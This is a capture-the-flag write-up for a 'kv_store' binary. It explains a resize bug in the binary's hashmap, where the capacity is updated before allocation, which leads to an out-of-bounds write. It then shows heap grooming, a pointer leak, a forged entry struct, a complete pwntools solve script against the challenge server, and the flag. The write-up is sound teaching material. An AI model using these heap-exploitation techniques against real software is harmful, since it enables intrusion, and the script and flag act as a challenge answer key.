Key Value Store
We are provided with kv_store
, an ELF that implements an open-addressing hashmap using a custom bitmap based memory allocator.
After about 2 hours of reversing the binary, we can deduce the structs used in implementing these two data structures.
Memory allocator
struct allocator
{
void *base_address;
uint32_t page_chunk_size[16];
char *page_occupancy[16];
};
The memory allocator consists of 16 pages, each 256 bytes long. Each page is divided into chunks of equal size (chunk size must be divisible by 16). To service allocations, the allocator finds a page consisting of chunks of the requested size. If no page with that chunk size is found, or all chunks in that page have been allocated, a new page is initialized. To track the availability of chunks within a page, the page_occupancy
array is used. The byte corresponding to the chunk is set to 1 if the chunk is allocated.
Since there is no vulnerability in the memory allocator, I won't go into the details of how it works.
Hashmap
An open-addressing hashtable using linear probing is implemented. The hash function used is custom, and not really relevant for the challenge. Both keys and values are arbitrary length strings.
Here are some relevant structs:
struct string
{
unsigned int len;
char data[];
};
struct entry
{
int hash;
string *val;
map *map;
};
struct map
{
unsigned int cap;
int len;
entry **entries;
};
Fairly standard hashmap implementation. Entries and strings are allocated using the custom allocator. The map
and entries
are allocated using the custom allocator:
map = (map *)custom_malloc(16);
::map = map;
if ( map )
{
map->cap = 4;
v2 = (entry **)custom_malloc(32);
v3 = ::map;
::map->entries = v2;
if ( v2 )
{
v4 = v3;
memset(v2, 0, 8LL * v3->cap);
result = v4;
v4->len = 0;
return result;
}
custom_free(v3);
}
The map is initialized with a capacity of 4 entries, with sufficient space in the entries
array to store the entry
pointers.
The program allows us to set, get and delete hash table entries. Here's the map_set
function:
__int64 __fastcall map_set(map *map, string *key, string *val)
{
unsigned int v3; // ebp
unsigned int v6; // eax
unsigned int cap; // ecx
unsigned int v8; // edx
entry **entries; // rsi
unsigned int v10; // r15d
entry *v11; // rdi
entry *v12; // rax
unsigned int len; // eax
v3 = 0;
if ( !map || !key )
return v3;
v6 = compute_hash(key);
cap = map->cap;
v8 = v6 & (map->cap - 1);
entries = map->entries;
v10 = v8;
v3 = 0;
while ( 1 )
{
v11 = entries[v10];
if ( !v11 )
{
if ( v10 != -1 )
{
v3 = v6;
v12 = (entry *)custom_malloc(24);
if ( v12 )
{
v12->map = map;
v12->hash = v3;
v12->val = val;
map->entries[v10] = v12;
len = map->len + 1;
map->len = len;
goto LABEL_15;
}
}
return 0;
}
if ( v11->hash == v6 )
break;
if ( ++v10 == cap )
v10 = 0;
if ( v10 == v8 )
return v3;
}
if ( v10 == -1 )
return 0;
custom_free(v11->val);
map->entries[v10]->val = val;
len = map->len;
LABEL_15:
LOBYTE(v3) = 1;
if ( map->cap <= 0x3F && len + (len >> 1) >= map->cap )
resize_map(map);
return v3;
}
Standard hashtable implementation right out of a data structures textbook.
However, notice the map resizing operation at the end:
if ( map->cap <= 0x3F && len + (len >> 1) >= map->cap )
resize_map(map);
It allows the map capacity to be up to 0x3f
(63) entries. However, this will take 63 * 8 = 504 bytes, much more than the maximum chunk size of 256 bytes custom_malloc
supports 🤔
Additionally, there doesn't seem to be any validation of resize_map
's return code.
Vulnerability
Most of the code in resize_map
is copying entries from the old array to the new array, which surprisingly was done correctly, so I will omit that part. Here's the vulnerable code section:
v12 = 2 * cap;
v13 = 64;
if ( v12 < 0x40 )
v13 = v12;
map->cap = v13;
v14 = (entry **)custom_malloc(8 * v13);
if ( !v14 )
return 0;
Notice that map->cap
is set before the new array is allocated. Thus, if we try to allocate an array of 64 entry pointers, map->cap
will be set to 64, but our actual entries array will be the old array with space for only 32 entries. Therefore, we can easily overflow into the next chunk's data, which can be a string we can read/write to, allowing us to leak pointers and gain read primitives.
In fact, simply allocating 40 entries into the hashtable will cause a crash.
Exploitation
Before going into the exploitation process, we must first discuss how the flag is loaded:
if ( (unsigned __int8)initialize_allocator() )
{
v0 = fopen("flag", "r");
fseek(v0, 0, 2);
v1 = ftell(v0);
rewind(v0);
v2 = malloc(v1 + 1);
v3 = fread(v2, 1u, v1, v0);
*((_BYTE *)v2 + v3) = 0;
fclose(v0);
strdup((char *)v2, v3);
free(v2);
LOBYTE(v0) = 1;
}
The flag, which we know to be 40 bytes long (from the challenge description) is read from the flag
file and allocated into the custom allocator's memory using the strdup
function:
string *__fastcall strdup(char *s, unsigned int n)
{
string *result; // rax
char *data; // r15
size_t v4; // r12
string *v5; // r14
unsigned __int64 v6; // rax
size_t v7; // rcx
result = (string *)custom_malloc(n + 5);
if ( result )
{
result->len = n;
data = result->data;
v4 = n;
v5 = result;
v6 = strlen(s);
if ( v6 >= n )
v6 = n;
strncpy(data, s, v6);
v7 = strlen(s);
result = v5;
if ( v7 < n )
v4 = v7;
v5->data[v4] = 0;
}
return result;
}
This function allocates sufficient space for 4 bytes indicating the string's length, the string data itself, and one byte for the null terminator. Note that while the indicated length (and thus size of buffer allocated) might be greater than the actual string's length, the string will be copied only up to the first null terminator (as strncpy
is used). The string is properly null-terminated too. Overall, this is a very safe function.
Since this is the first allocation using the custom memory allocator, we know that the first page will contain chunks of size 0x30
, and the flag string is located at the base of the custom memory region.
Once the map is initialized, we will observe that the second page contains chunks of size 0x10
(used to store the map
struct) and the third page contains chunks of size 0x20
(used to store the initial entries
array).
Next, let's check out the wrapper code for the map operations:
Get:
v9 = strdup(input->data, input->len);
map = init_map();
v11 = map_get(map, v9);
free_1(v9);
if ( v11 )
printf("result : %s\n", v11->data);
Set:
v5 = strdup(key->data, key->len);
v6 = strdup(val->data, val->len);
inited = init_map();
v8 = map_set(inited, v5, v6);
v13 = v8;
free_1(v5);
printf("result : %d\n", v13);
free(v4);
return 1;
Delete:
v5 = strdup(input->data, input->len);
v12 = init_map();
v8 = map_del(v12, v5, 0);
Note that init_map
returns the gloabl variable map
if it is already initialized. Only one map is created throughout the whole program.
The key and value strings are copied into the custom allocator (using strdup
) before they are stored in the hashtable. The key string is freed after use (except in the case of delete), as its hash is stored instead. The value string pointer is directly stored in the hashmap without further copying.
Heap setup
To setup the custom heap for our exploit, we want the entries
array to be allocated right before a chunk that we control.
The get
operation is particularly helpful for creating free chunks. If we attempt to access a key that does not exist, the allocated string is freed after the map_get
operation.
get(b"A"*0x30) # I'm not sure why i did this
get(b"A"*0x40) # Or this
# Step 1: Allocate 9 entries
# Entries is resized to cap 0x10
for i in range(9):
x = str(i).encode()
set(x, x)
After step 1, our hashtable contains 9 elements, having resized twice from a capacity of 4, then to 8, and finally to 16 entries.
We have allocated 7 pages. Their chunk sizes are shown below:
0x30 0x40 0x10 0x20 0x50 0x80 0x20
The page of size 0x80
contains our current entries
array.
# Step 2: Create a page containing a free chunk of size 0x100
get(b"A"*250)
# Step 3: Allocate a new page right after the 0x100 page
set(b"AA", b"CAFE"+b"A"*16+b"\0"*0xc0)
After step 2, we have an additional page of size 0x100
. This page is empty, and contains the chunk that will be allocated to the new entries
array later.
0x30 0x40 0x10 0x20 0x50 0x80 0x20 0x100
In step 3, we add a new entry to the hashtable. The value of this entry is large enough to result in the allocation of a new chunk of size 0xe0
, right after the size 0x100
chunk:
0x30 0x40 0x10 0x20 0x50 0x80 0x20 0x100 0xe0
The future entries array will overflow into this 0xe0
chunk (which is marked with the prefix CAFE
).
# Step 4: Trigger resizing to cap 0x20, then 0x40
for i in range(12):
x = str(i+20).encode()
set(x, x)
In step 4, we add 12 more entries to trigger the resizing of the entries
array to capacity 0x20
(at len == 11). This causes the entries
array to be allocated into the 0x100
chunk we have freed earlier.
The capacity of the hashtable is then updated to 0x40
(at len == 22, right after the last entry is set). However, the custom memory allocator is unable to supply a chunk of sufficient size. Therefore, the old entries
array in chunk 0x100
remains in use.
Our heap is now setup for the attack.
Leaking heap base address
Our first goal will be to leak a pointer from the custom heap. We can then calculate the address where the flag is stored.
To do this, we will create a new entry such that its position in the entries
array exceeds 0x20, so that it will overflow the 0x100
chunk and be placed into the 0xe0
chunk which we can read from.
The 0xe0
chunk has been setup so that offset 0x18 nicely lines up with the end of the string of As:
Recall that our hash table capacity is currently 0x40. Thus, if we can find a key such that hash(key) % 0x40 == 0x23
, the entry pointer will nicely land in the 8 bytes starting from offset 0x18
in the 0xe0
chunk. With some luck, there will be no null bytes in the pointer, and we will be able to leak the pointer by reading the 0xe0
chunk (with key AA
).
With some bruteforce, we find that the key AAA1400020
hashes to a value that equals 0x23 modulo 0x40. We can verify that the pointer has indeed been placed as expected:
We are thus able to leak the base address of the custom heap, and therefore the address of the flag.
k = b"AAA1400020"#generate_collision2(b"AAA", 0x23, 0x40)
set(k, b"AAA")
get(b"AA")
p.recvuntil(b"result : CAFEAAAAAAAAAAAAAAAA")
leak = u64(p.recv(6)+b"\0\0")
print(hex(leak))
flag_loc = leak - 0xac0
assert flag_loc & 0xfff == 0
Reading the flag
To read the flag, we will need to generate a fake entry struct, then use our control over part of the entries
array to insert our impostor entry into the map.
Recall that the entry struct contains the int hash
and a pointer to the value:
struct entry
{
int hash;
string *val;
map *map;
};
As our fake struct will contain null bytes, allocating it onto the custom heap is slightly complicated by the behavior of strdup
.
Since the map
pointer is not used in the get
operation, we can safely set it to any arbitrary value (or 0).
Additionally, while hash
is an integer, there are 4 padding bytes between it and val
. Luckily, only the lower 4 bytes are used for the hash comparison, so we can fill the other 4 bytes with AAAA.
The final problem is caused by the position of the flag within the heap. Since it is the first object allocated within the heap, its LSB will be 0. This will cause the rest of the address of flag to not be copied into our fake entry due to the null terminating behavior of strdup
.
However, we can solve this problem by first allocating a fake entry with a non-zero flag address LSB, then freeing it and reallocating it with a null byte. Since freed memory is not zeroed, the upper bytes of the address will still remain, while the null byte will be added as the null terminator of the new string.
One final consideration is the hash value to use for our fake entry. We would like it to hash to position 0x23
again, as we can easily insert the fake entry's address there using our control over the 0xe0
chunk.
flag_key = generate_collision2(b"FLAG", 0x23, 0x40)
set(b"AAAA", b"FAKE_ENTRY!!"+p32(compute_hash(flag_key))+b"A"*4+p64(flag_loc)+p32(0))
delete(b"AAAA")
set(b"AAAA", b"FAKE_ENTRY!!"+p32(compute_hash(flag_key))+b"A"*4+p64(0)+p32(0))
We can see the fake entry struct starting from address 0x7fa783892040
:
The flag string is stored at 0x00007fa783892000
(remember the first 4 bytes are the length):
Now, all that's left is to insert our impostor entry into the map, then read it to get the flag:
fake_chunk_addr = leak - 0xa80
delete(b"AA")
set(b"AA", b"CAFE"+b"B"*16+p64(fake_chunk_addr)+p64(0)+b"\0"*0xb0)
get(flag_key)
Solve script
from ctflib.pwn import *
e = ELF("kv_store")
context.binary = e
def setup():
# p = process()
p = remote("nc cddc2025-challs-nlb-579269aea83cde66.elb.ap-southeast-1.amazonaws.com 8888")
return p
def compute_hash(data):
"""
Translates the C++ hash function to Python
Args:
data: bytes or string to hash
Returns:
int: hash value (32-bit)
"""
if data is None:
return 0xFFFFFFFF
# Convert string to bytes if needed
if isinstance(data, str):
data = data.encode('utf-8')
length = len(data)
if length == 0:
return 0x13371338
if length == 1:
v2 = 0x13371338
v3 = 0
# LABEL_13 equivalent
byte_val = (v2 >> (8 * v3)) & 0xFF
new_byte = (byte_val + (v3 ^ data[v3])) & 0xFF
v7 = ((new_byte << (8 * v3)) + v2 - ((byte_val << (8 * v3)))) & 0xFFFFFFFF
if v7 < 0xFFFFFFFE:
return v7
return 0xFFFFFFFE
v2 = 0x13371338
v5 = 8
v3 = 0
# Process pairs of bytes
while v3 < (length & 0xFFFFFFFE):
# First byte processing
shift1 = (v5 - 8) & 0x10
byte1 = (v2 >> shift1) & 0xFF
new_byte1 = (byte1 + (v3 ^ data[v3])) & 0xFF
v6 = (v2 - ((byte1 << shift1)) + ((new_byte1 << shift1))) & 0xFFFFFFFF
# Second byte processing
shift2 = v5 & 0x18
byte2 = (v6 >> shift2) & 0xFF
new_byte2 = (byte2 + (data[v3 + 1] ^ (v3 + 1))) & 0xFF
v2 = (v6 - ((byte2 << shift2)) + ((new_byte2 << shift2))) & 0xFFFFFFFF
v3 += 2
v5 += 16
# Handle odd length (single remaining byte)
if (length & 1) != 0:
# LABEL_13 equivalent for remaining byte
byte_val = (v2 >> (8 * v3)) & 0xFF
new_byte = (byte_val + (v3 ^ data[v3])) & 0xFF
v7 = ((new_byte << (8 * v3)) + v2 - ((byte_val << (8 * v3)))) & 0xFFFFFFFF
if v7 < 0xFFFFFFFE:
return v7
return 0xFFFFFFFE
if v2 < 0xFFFFFFFE:
return v2
return 0xFFFFFFFE
def make_item(l, s):
return p16(l) + s
def set(k, v):
pl = p32(1) + p32(2)
pl += make_item(len(k), k)
pl += make_item(len(v), v)
p.send(pl)
p.recvuntil(b"result : ")
return int(p.recvline())
def get(k):
pl = p32(2) + p32(1)
pl += make_item(len(k), k)
p.send(pl)
# p.recvuntil(b"result : ")
# return p.recvline()
def delete(k):
pl = p32(3) + p32(1)
pl += make_item(len(k), k)
p.send(pl)
p.recvuntil(b"result : ")
return p.recvline()
def generate_collision(s1, s2, hash_size):
i = 0
target = compute_hash(s1) & (hash_size-1)
while True:
x = s2 + str(i).encode()
if compute_hash(x) & (hash_size-1) == target:
return x
i += 1
def generate_collision2(prefix, target, hash_size):
i = 0
while True:
x = prefix + str(i).encode()
if compute_hash(x) & (hash_size-1) == target:
return x
i += 1
if __name__ == '__main__':
p = setup()
get(b"A"*0x30)
get(b"A"*0x40)
for i in range(9):
x = str(i).encode()
set(x, x)
get(b"A"*250)
set(b"AA", b"CAFE"+b"A"*16+b"\0"*0xc0)
for i in range(12):
x = str(i+20).encode()
set(x, x)
# gdb.attach(p)
k = b"AAA1400020"#generate_collision2(b"AAA", 0x23, 0x40)
set(k, b"AAA")
get(b"AA")
p.recvuntil(b"result : CAFEAAAAAAAAAAAAAAAA")
leak = u64(p.recv(6)+b"\0\0")
print(hex(leak))
flag_loc = leak - 0xac0
assert flag_loc & 0xfff == 0
flag_loc += ord("A")
flag_key = generate_collision2(b"FLAG", 0x23, 0x40)
set(b"AAAA", b"FAKE_CHUNK!!"+p32(compute_hash(flag_key))+b"A"*4+p64(flag_loc)+p32(0))
delete(b"AAAA")
set(b"AAAA", b"FAKE_CHUNK!!"+p32(compute_hash(flag_key))+b"A"*4+p64(0)+p32(0))
fake_chunk_addr = leak - 0xa80
delete(b"AA")
set(b"AA", b"CAFE"+b"B"*16+p64(fake_chunk_addr)+p64(0)+b"\0"*0xb0)
get(flag_key)
p.interactive()
Flag
CDDC2025{CEI_pAttErN_m4Ke5_pR0gRam_s4f3}